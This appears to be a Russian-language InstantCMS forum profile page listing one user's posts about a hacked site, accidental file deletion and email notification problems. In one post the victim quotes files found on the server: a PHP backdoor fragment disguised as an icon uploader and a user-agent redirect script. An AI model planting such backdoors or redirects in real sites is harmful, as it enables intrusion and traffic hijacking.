R

Rich

+31
Репутация
6001
Рейтинг
#1 Дыра в сайте 2 31 марта 2015 в 20:05
PIN

Но там непонятки )

wayfox
Да, это он

У одного пол сайта, у другого дыра ))

PIN
Гуманитарий, что с такого взять)
#1 Снес пол сайта ( 31 марта 2015 в 19:35
Всем привет, по запарке снес половину папок на сервере(
Последний бэкап староватый… может на сервере есть бекап — где посмотреть ?

Подскажите, как починить..
Был InstantCMS v1.10.3

Вот что осталось :

modules
plugins
scgi-bin
templates
upload
#2 Дыра в сайте 2 31 марта 2015 в 19:28
Какие команды нужно вписать в крон, я в этой теме профан (
#3 Дыра в сайте 2 19 октября 2014 в 20:53

Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php

Rich

Капец, эти файлы после удаления опять появились, что делать ???
#4 Дыра в сайте 2 13 октября 2014 в 16:22
Al-Bolit есть у меня, но чет я не особо ему доверял… так и не использовал его, надо поюзать… Стоит AVG врде суровый антивирь)
Бекапы серверными средствами делаю.
#5 Дыра в сайте 2 12 октября 2014 в 23:27
Александр, согласен… серверный антивирь нашел 4 шелла, причем заражены были и пара других сайтов.
#6 Дыра в сайте 2 12 октября 2014 в 11:52
Нашел в аналитике webalizerftp какого то пользователя для ftp, примечательно то, что я не создавал такого пользователя и нигде больше он не виден… где он мог прописаться?
#7 Дыра в сайте 2 12 октября 2014 в 10:53
сегодня нашел файл — custom_icons2.php в корне сайта
  1. ;
  2. $p = array($_REQUEST['x']);
  3. $pf = array_filter($p, $f);exit;
  4. ?>
  5. <div class="custom-icon-uploader" id="custom_icon_uploader">
  6. <span class="spinner" style="display:none"></span>
  7. <button class="upload button-secondary" id="custom_icon_upload_button"><?php _e( 'Upload Icon', 'wptouch-pro' ); ?></button>
  8. <div class="progress progress-striped progress-success" style="display: none;" title="<?php _e( 'Upload Complete!', 'wptouch-pro' ); ?>" rel="popover" data-placement="right">
  9. <div class="bar" style="width: 20%;"></div>
  10. </div>
  11.  
  12. <br class="clearfix" />
  13. <span class="upload-desc"><?php _e( 'Ready to upload', 'wptouch-pro' ); ?>&hellip;</span>
  14. <div id="custom_icon_uploader_spot" style="display: none;"></div>
  15. </div>
и файл inc.php

[hide]<script>
<?if($_SERVER['HTTP_USER_AGENT'] == 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'){?>
window.location="http://my.mail.ru/"
<?}else{?>
window.location="http://google.ru"
<?}?>
</script>[/hide]
где и как можно узнать, каким образом они туда попали?
#8 Дыра в сайте 2 12 октября 2014 в 10:24
Заметил хостер, предупреждает уже третий раз(… они сказали смотреть в скриптах, в каких именно не уточнили.
Насколько я понял, было перенаправление на какую то страницу, при просмотре сайта на мобильных устройствах.
Также с сайта идет рассылка каких то писем, я как то порылся в одной из найденных залитых, чужих страниц… нашел в оконцовке сайт куда идет перенаправление — на сайт каких то курсов в Москве..
Пока поменяю пароли… ума не приложу, как закрыть доступ.
#1 Дыра в сайте 2 11 октября 2014 в 22:47
Всем привет !
Прошу специалистов подсказать, как обнаружить и закрыть дыры в сайте .
Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php
Шаблон Adattive, v1.10.3
#9 Снова об уведомлениях на емайл 14 сентября 2014 в 19:04

А сообщения вроде нет.

Lora
Уведомление на почту о новом личном сообщении приходит. Только у меня не работает(

оказывается не только у меня — instantcms.ru/forum/thread14763-1.html

получается проблема общая?
#10 Снова об уведомлениях на емайл 14 сентября 2014 в 18:47
письмо подтверждения регистрации пришло по указанному при реги емайл от Root User <root@localhost>
а вот уведомление о личном сообщении на емайл не приходит
#11 Снова об уведомлениях на емайл 14 сентября 2014 в 14:45
проверял на тех, кто не онлайн, разрешение на получение писем у них стоит
#1 Снова об уведомлениях на емайл 14 сентября 2014 в 13:10
Всем привет, не могу разобраться, почему не приходят уведомления на емайл, когда пришло личное сообщение пользователю ?
В настройках сайта во вкладке Почта указывал Функция майл в php там без авторизации, я так понял вообще без настроек все работает ?
Но письма на емайл не приходят..
Потом обратился к хостеру, он сказал создать почтовый аккаунт, я его создал. Аккаунт подходит к трем почтовым программам на сервере — Хорда, белка и раундкуб.
После этого я в админке сайта в настройках(Почта) указал SMTP сервер… там казал имя и пароль от почтовых сервисов на моем сервере, но и после этого письма не приходят...
Хостер дал скрипт проверки отправки писем phpmail, я его выполнил — письмо пришло..

Таким образом проблема где то на сайте или в настройках...
Подскажите, где еще покапать? может права доступа каких то файлов поменять? или скрипт отправки проверить?
Кстати при регистрации письмо уведомление на почту приходит.
#12 [ЕСТЬ РЕШЕНИЕ] Компонент Прайслист 13 августа 2014 в 22:38
Как бы особо и не искал — в первом посте задан вопрос — у кого работает?
Выяснилось, что компонента уже нет… я думал, что только у меня проблема.
Сделал на WP-движке, что то типа витрины, магазина.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.